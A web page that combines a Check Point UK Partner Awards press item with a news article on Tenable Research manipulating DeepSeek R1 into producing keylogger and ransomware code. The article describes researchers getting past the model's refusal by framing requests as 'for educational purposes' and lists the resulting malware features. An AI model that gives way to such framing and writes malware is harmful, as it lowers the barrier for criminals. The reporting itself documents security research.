Organisations of all sizes have faced unprecedented challenges when it comes to cyber security over the past year. Check Point’s State of Cyber Security 2025 report revealed that there’s been a worrying 44% increase in global cyberattacks year on year, with a 58% surge in infostealer attacks, pointing to a maturing threat ecosystem. This, compounded by the rising threat faced by AI-fuelled attacks, increased targeting of Edge devices, and complexity of ransomware, has presented organisations with a challenging cyber landscape to manage thoroughly, especially alongside maintaining innovation and business growth. Check Point’s partners help organisations manage the rising risks with trust and ease, making the business ecosystem safer for all.

The Check Point UK Partner Awards recognise the exceptional accomplishments of regional industry leaders in tackling the critical cyber security issues their clients face. These awards celebrate the commitment, effort, and triumphs of key figures in the cyber security field who are working relentlessly to safeguard businesses and individuals in the face of rising threats. Channel partners are indispensable as an extension of these organisations, assisting in the development of resilience and the reinforcement of cyber security, all without requiring internal Security Operations Centres (SOCs).

The winners of the 2025 UK Partner Awards were: 

  • Marketplace Partner of the Year: Computacenter
  • Quantum Partner of the Year: BT
  • Harmony Partner of the Year: Softcat
  • Cloud Partner of the Year: Computacenter
  • Infinity Partner of the Year: Bytes
  • Distribution Partner of the Year: Westcon
  • Rising Star Partner of the Year: Systal
  • New Logo Partner of the Year: Softcat
  • Project of the Year: World Wide Technology
  • Technical Champion of the Year: John Tammaro, SEP2
  • Sales Champion of the Year: Becky Clayton, Westcon
  • Marketing Champion of the Year: Daniela Miccardi, Bytes
  • Check Point Champion of the Year: Michael Lenham, Bytes
  • Global Systems Integrator of the Year: BT
  • Partner of the Year: BT

“Every day, our partners are on the frontlines, helping businesses stay one step ahead of increasingly sophisticated cyber threats,” said Mark Weir, Regional Director UK&I at Check Point Software. “ In a year where AI-fuelled attacks and targeted ransomware campaigns have surged, their dedication, expertise, and innovation have been crucial in protecting organisations across the UK. These awards are not just about recognising success—they’re about celebrating the relentless commitment of our partners to keeping businesses secure, resilient, and future-ready. We’re incredibly proud to work alongside such a talented and driven network and look forward to another year of growth and shared victories.”

At the ceremony, over £2,000 was raised for LupusUK

The post Check Point Software Celebrates Continued Partner Success at UK Partner Awards appeared first on IT Security Guru.

AI Chatbot DeepSeek R1 Can Be Manipulated to Create Malware

0

Tenable Research reveals that AI chatbot DeepSeek R1 can be manipulated to generate keyloggers and ransomware code. While not fully autonomous, it provides a playground for cybercriminals to refine and exploit its capabilities for malicious purposes.

A new analysis from cybersecurity firm Tenable Research reveals that the open-source AI chatbot DeepSeek R1 can be manipulated to generate malicious software, including keyloggers and ransomware.

Tenable’s research team set out to assess DeepSeek’s ability to create harmful code. They focused on two common types of malware: keyloggers, which secretly record keystrokes, and ransomware, which encrypts files and demands payment for their release.

While the AI chatbot isn’t producing fully functional malware “out of the box,” and requires proper guidance and manual code corrections to produce a fully working keylogger; the research suggests that it could lower the barrier to entry for cybercriminals.

Initially, like other large language models (LLMs), DeepSeek stood up to its built-in ethical guidelines and refused direct requests to write malware. However, the Tenable researchers employed a “jailbreak” technique tricking the AI by framing the request for “educational purposes” to bypass these restrictions.

The researchers leveraged a key part of DeepSeek’s functionality: its “chain-of-thought” (CoT) capability. This feature allows the AI to explain its reasoning process step-by-step, much like someone thinking aloud while solving a problem. By observing DeepSeek’s CoT, researchers gained insights into how the AI approached malware development and even recognised the need for stealth techniques to avoid detection.

DeepSeek Building Keylogger

When tasked with building a keylogger, DeepSeek first outlined a plan and then generated C++ code. This initial code was flawed and contained several errors that the AI itself could not fix. However, with a few manual code adjustments by the researchers, the keylogger became functional, successfully logging keystrokes to a file.

Taking it a step further, the researchers prompted DeepSeek to help enhance the malware by hiding the log file and encrypting its contents, which it managed to provide code for, again requiring minor human correction.

This screenshot displays the keylogger created by DeepSeek running in the Task Manager, alongside the log file it generated. (Credit: Tenable Research)

DeepSeek Building Ransomware

The experiment with ransomware followed a similar pattern. DeepSeek laid out its strategy for creating file-encrypting malware. It produced several code samples designed to perform this function, but none of these initial versions would compile without manual editing.

Nevertheless, after some tweaking by the Tenable team, some of the ransomware samples were made operational. These functional samples included features for finding and encrypting files, a method to ensure the malware runs automatically when the system starts, and even a pop-up message informing the victim about the encryption.

DeepSeek Struggled with Complex Malicious Tasks

While DeepSeek demonstrated an ability to generate the basic building blocks of malware, Tenable’s findings highlight that it’s far from a push-button solution for cybercriminals. Creating effective malware still requires technical knowledge to guide the AI and debug the resulting code. For instance, DeepSeek struggled with more complex tasks like making the malware process invisible to the system’s task manager.

However, despite these limitations, Tenable researchers believe that access to tools like DeepSeek could accelerate malware development activities. The AI can provide a significant head start, offering code snippets and outlining necessary steps, which could be particularly helpful for individuals with limited coding experience looking to engage in cybercrime.

“DeepSeek can create the basic structure for malware,” explains Tenable’s technical report shared with Hackread.com ahead of its publishing on Thursday. “However, it is not capable of doing so without additional prompt engineering as well as manual code editing for more advanced features.” The AI struggled with more complex tasks like completely hiding the malware’s presence from system monitoring tools.

Trey Ford, Chief Information Security Officer at Bugcrowd, a San Francisco, Calif.-based leader in crowdsourced cybersecurity commented on the latest development emphasising that AI can aid both good and bad actors, but security efforts should focus on making cyberattacks more costly by hardening endpoints rather than expecting EDR solutions to prevent all threats.

Criminals are going to be criminals – and they’re going to use every tool and technique available to them. GenAI-assisted development is going to enable a new generation of developers – for altruistic and malicious efforts alike, said Trey,

As a reminder, the EDR market is explicitly endpoint DETECTION and RESPONSE – they’re not intended to disrupt all attacks. Ultimately, we need to do what we can to drive up the cost of these campaigns by making endpoints harder to exploit – pointedly they need to be hardened to CIS 1 or 2 benchmarks, he explained.


Popular Posts

My Favorites